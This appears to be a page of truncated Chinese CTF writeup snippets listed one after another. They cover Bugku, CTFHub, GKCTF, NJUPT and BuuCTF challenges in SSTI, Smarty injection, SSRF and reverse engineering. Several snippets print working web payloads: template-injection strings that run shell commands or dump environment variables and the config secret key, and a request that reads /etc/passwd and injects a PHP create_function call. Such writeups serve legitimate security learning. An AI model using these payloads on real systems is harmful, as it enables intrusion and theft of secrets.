地址:https://ctf.bugku.com/ Simple_SSTI_1 模板注入,查看页面源代码 很明显,flag在secret_key下 构建如下url:http://114.67.175.224:12784/?flag={{config.SECRET_KEY}} or在地址栏后面输入:/
在CTF大赛中,WriteUp的作用是什么? 第一届四叶草网络安全学院牛年 CTF大赛 Web ★GET 考点 smarty模板注入 思路 根据提示输入GET参数得到源码.发现为smarty模板注入 payload: ?name={if passthru ('nl fl*')}{/if} ★Website 考点 ssrf中使用302跳转进行bypass 思路 一开始尝试dict、file、gopher等协议,发现...
虽然 XCTF 的分站赛主办方都会公布 writeup,但还是很想记录并顺手分享一下我自己在解这道题目时的整个思考过程。尤其是这几年 CTF 中逆向方向其实已经把基础考点都考的差不多了,现在更多的是在创新性上下文章,分析程序的思路就显得更重要了。 在上手做这道题目之前首先需要对 C++ 的模板及泛型编程有个大概的了...
结束。 ✨Writeup 在CTFHubwriteup页面搜索egg 或者是直接翻到最后一页 https://writeup.ctfhub.com/Skill/egg.html 打开链接获得flag flag:ctfhub{0936de34af2a6dd91fbd88fead25fc877c8a4b1b} 结束。 ✨工具 在CTFHub工具页面翻到最后发现egg 点击链接后在链接跳转至404之前地址栏闪过flag flag:ctfhub{19d...
2021年6月26日,GKCTF X DASCTF应急挑战杯圆满落幕。 本次竞赛涵盖WEB、CRYPTO、MISC、PWN、REVERSE常规CTF五大类赛题。 本篇主要分享WEB方向writeup,一起来看看吧~ NO.00 WEB类榜单 NO.01 ezcms 访问admin.php,可以访问到后台,后台账号密码为弱⼝令 ...
实验吧 recursive write up 这是一个python写的文件 推测是用Freeze打包 所以必有一个Py_FrozenMain函数 分析函数有两个变量PYTHONINSPECT”和“PYTHONUNBUFFERED”之后都会调用getenv()函数 函数说明:getenv()用来取得参数envvar环境变量的内容。参数envvar为环境变量的名称,如果该变量存在则会返回指向该内容的指针。 所以...
这里存在SSTI模板注入点,输入{{7*7}} 可以看到回显49,找个payload直接打了: flag在环境变量里 {{ config.__class__.__init__.__globals__['os'].popen('env').read() }} Misc 签到 扫码签到发消息得到flag 你说爱我?尊嘟假嘟 ook+base64 ...
Hackerone 50m-ctf writeup(第二部分) 前言 本文的第一部分文章链接 上文我们已经获得一个可以从外网访问的真实IP Server 104.196.12.98 第一步是侦查,这里使用端口扫描来发现是否有服务运行,结果我得到了80端口(http)。 Starting masscan 1.0.6 (http://bit.ly/14GZzcT ) at 2019-03-02 22:32:46 GMT...
NJUPT CTF 天璇Writeup [TOC] Web hacker_backdoor import requests url = "http://nctf2019.x1ct34m.com:60004/?useful=/etc/passwd&code=$a=%22create_f%22.%22unction%22;$c=$a(%27%27,$_POST[a]);$c();" print requests.post(url,data={'a':""" ...
BuuCTFWebWriteup第一部分 BuuCTFWebWriteup第⼀部分[HCTF 2018]WarmUp 查看源码提⽰source.php,并在 $whitelist = ["source"=>"source.php","hint"=>"hint.php"];代码提⽰下同时访问hint.php 题⽬源码 source.php <?php highlight_file(__FILE__);class emmm { public static function check...